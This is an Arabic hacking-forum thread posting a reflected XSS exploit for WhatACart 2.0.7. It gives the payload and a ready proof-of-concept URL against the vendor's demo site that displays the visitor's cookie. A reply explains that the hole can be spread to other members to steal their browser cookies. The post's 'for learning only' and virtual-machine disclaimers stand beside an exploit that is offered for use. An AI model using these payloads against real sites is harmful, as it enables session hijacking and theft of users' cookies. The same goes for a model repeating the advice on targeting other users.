مضى على الشبكة و يوم من العطاء.
  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS

ExEExE is verified member.

.:: كبار شخصيات المنتدى ::.
>:: v1p ::<

السمعة:

ادخل هذا الموقع :

Opera Snapshot_2023-12-28_185618_demo.whatacart.com.png



حط بالبحث البايلود هذا:

<sVg/onLy=1 onLoaD=confirm(1)//

Screenshot_2023-12-28_10_59_26.png


https://demo.whatacart.com/site/default/search?keyword=<sVg/onLy=1+onLoaD=confirm(document.cookie)//&navsearch=

زر تنبيه


..... للتعلم فقط :)
 
التعديل الأخير بواسطة المشرف:
الثغره الوحييدة الي ضايع فيها وماعرف استعملها ولة عرفت طرق استغلالها وانواعها
 
هي ممكن تستعمل الثغرة هادي سكام تنشرها للأعضاء الآخرين لسرقة الcookies الخاص بهم في المتصفح أما كإختراق فعلي للموقع ليس لها تأثير ويتم تنفيذها على المتصفح فقط اما على السرفر فلا يتم تنفيذها إلا إذا كانت نوعها store فيمكنك إذا كانت store أن تفعل الفعائل
 

آخر المشاركات

فانوس

رمضان
عودة
أعلى